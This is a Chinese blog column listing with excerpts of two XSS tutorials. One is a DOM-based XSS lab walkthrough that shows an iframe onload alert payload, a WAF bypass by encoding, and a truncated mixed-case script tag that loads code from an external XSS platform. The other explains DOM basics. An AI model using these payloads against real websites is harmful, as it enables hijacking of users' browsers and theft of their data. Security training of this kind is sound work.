xss
文章平均质量分 59
玛卡巴卡巴巴亚卡
这个作者很懒,什么都没留下…
展开
-
dom型xss靶场注入
我们点开靶场的源码发现有关键函数document.write()我们尝试在url里输入,发现这里可以控制传参我们输入事件型,发现被waf拦截了换一种方式,使用<iframe onload=alert(/xss/),发现弹窗,说明存在xss漏洞,但是只是一个反射型xss。我们在xsspt上找到一个xss代码,输入代码,发现被waf拦截,这里可以使用navie编码再尝试。(因为document.write支持)在如下网址转化 <sCrIpt srC=//xs..原创 2021-04-25 16:39:52 · 318 阅读 · 0 评论 -
六、前端XSS——(3)DOM型XSS
一、DOM型XSSDOM(Document ObjectModel)是一个树形模型,可以编写JavaScript代码根据dom一层一层的节点,去遍历/获取/修改对应的节点、对象、值。DOM是一个JS可以操纵浏览器和网页显示内容的接口。每个载入浏览器的HTML文档都会成为Documnet对象,Document对象使我们可以从脚本中队HTML页面中的所有元素进行访问lastModified可以判断伪静态。做dom型XSS一定要审计。1.html...原创 2021-04-25 16:09:02 · 994 阅读 · 0 评论